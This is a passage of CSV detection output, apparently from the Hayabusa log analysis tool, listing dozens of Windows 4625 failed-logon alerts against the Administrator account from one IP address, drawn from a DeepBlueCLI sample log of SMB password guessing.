NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
